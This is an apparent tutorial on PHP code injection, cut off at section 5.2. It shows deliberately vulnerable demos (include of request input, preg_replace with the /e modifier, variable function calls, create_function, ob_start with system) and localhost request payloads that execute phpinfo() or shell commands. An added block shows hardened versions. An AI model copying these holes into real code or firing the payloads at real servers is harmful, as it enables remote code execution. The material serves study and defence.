1 Code execution functions
PHP functions that can execute code, such as eval(), assert(), `` (backticks), system(), exec(), shell_exec(), passthru(), escapeshellcmd(), pcntl_exec(), etc.
demo code 1.1:
<?php
// The backtick operator runs its contents as a shell command.
echo `dir`;
?>
2 File inclusion code injection
File inclusion functions such as include(), include_once(), require() and require_once() lead to code injection under certain conditions.
When allow_url_include = On and PHP version >= 5.2.0, code injection results.
demo code 2.1:
<?php
// The request parameter is passed to include() unchanged.
include($_GET['a']);
?>
Accessing http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E executes phpinfo().
3 Regular expression matching code injection
The preg_replace() function is known to cause code injection. When the pattern carries the /e pattern modifier, the replacement is executed as code. We discuss three cases below.
3.1 preg_replace() pattern parameter injection
Code injection through pattern, the first parameter.
When magic_quotes_gpc = Off, this leads to code execution.
demo code 3.1:
<?php
// The request parameter is appended to the pattern, so it can supply the closing delimiter and the /e modifier.
echo $regexp = $_GET['reg'];
$var = '<php>phpinfo()</php>';
preg_replace("/<php>(.*?)$regexp", '\\1', $var);
?>
Accessing http://127.0.0.1/preg_replace1.php?reg=%3C\/php%3E/e executes phpinfo().
3.2 preg_replace() replacement parameter injection
Code injection through replacement, the second parameter, resulting in code execution.
demo code 3.2:
<?php
// With /e, the replacement string (taken from the request) is evaluated as PHP.
preg_replace("/menzhi007/e", $_GET['h'], "jutst test");
?>
Submitting http://127.0.0.1/preg_replace2.php?h=phpinfo() executes phpinfo().
3.3 preg_replace() third parameter injection
Code is injected by constructing the subject parameter. Submitting http://127.0.0.1/preg_replace3.php?h=[php]phpinfo()[/php]
or http://127.0.0.1/preg_replace3.php?h=[php]$(phpinfo%28%29)[/php] leads to code execution.
demo code 3.3:
<?php
// With /e, the text captured from the request-supplied subject is evaluated as PHP.
preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $_GET['h']);
?>
4 Dynamic code execution
4.1 Dynamic variable code execution
demo code 4.1:
<?php
// Both the function name and its argument come from the request.
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>
Submitting http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig executes the ipconfig command.
4.2 Dynamic function code execution
demo code 4.2:
<?php
// create_function() evaluates the body string, which here contains request input.
$foobar = $_GET['foobar'];
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>
Submitting http://127.0.0.1/create_function.php?foobar=system%28dir%29 executes the dir command.
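Hardened counterparts of demo code 2.1, 3.3 and 4.1, as an added example that is not part of the original article: request input selects from fixed allowlists or is handled as data in preg_replace_callback(), so it never reaches include(), the /e modifier or a variable function call. The names PAGES, ACTIONS, load_page, render_tags and dispatch and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example; PAGES, ACTIONS, load_page, render_tags and dispatch are hypothetical names.

// 2.1 hardened: the request value is a key into a fixed map, never a path or URL.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function load_page(string $key): ?string
{
    // Returns a path that is safe to include, or null for anything not in the map.
    return array_key_exists($key, PAGES) ? __DIR__ . '/pages/' . PAGES[$key] : null;
}

// 3.x hardened: no /e modifier; the captured text stays data inside a callback.
function render_tags(string $subject): string
{
    $out = preg_replace_callback(
        '/\s*\[php\](.+?)\[\/php\]\s*/is',
        static function (array $m): string {
            return htmlspecialchars($m[1], ENT_QUOTES, 'UTF-8');
        },
        $subject
    );
    return $out ?? '';   // null means a PCRE error; emit nothing
}

// 4.1 hardened: the request picks an entry from an allowlist of callables.
const ACTIONS = ['upper' => 'strtoupper', 'length' => 'strlen'];

function dispatch(string $name, string $argument)
{
    if (!array_key_exists($name, ACTIONS)) {
        throw new InvalidArgumentException('unknown action');
    }
    return call_user_func(ACTIONS[$name], $argument);
}

// Constructed inputs mirroring the requests in sections 2, 3.3 and 4.1.
var_dump(load_page('data:text/plain,x'));        // not a map key
var_dump(load_page('about'));
var_dump(render_tags('[php]phpinfo()[/php]'));   // returned as inert text
try {
    dispatch('system', 'ipconfig');              // not in the allowlist
} catch (InvalidArgumentException $e) {
    var_dump($e->getMessage());
}
var_dump(dispatch('upper', 'ok'));
```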
5 Other
5.1 ob_start() function code execution
demo code 5.1:
<?php
// The output callback is system(), which receives the buffered text 'dir' when the buffer is flushed.
$foobar = 'system';
ob_start($foobar);
echo 'dir';
ob_end_flush();
?>
5.2 array_map() function code execution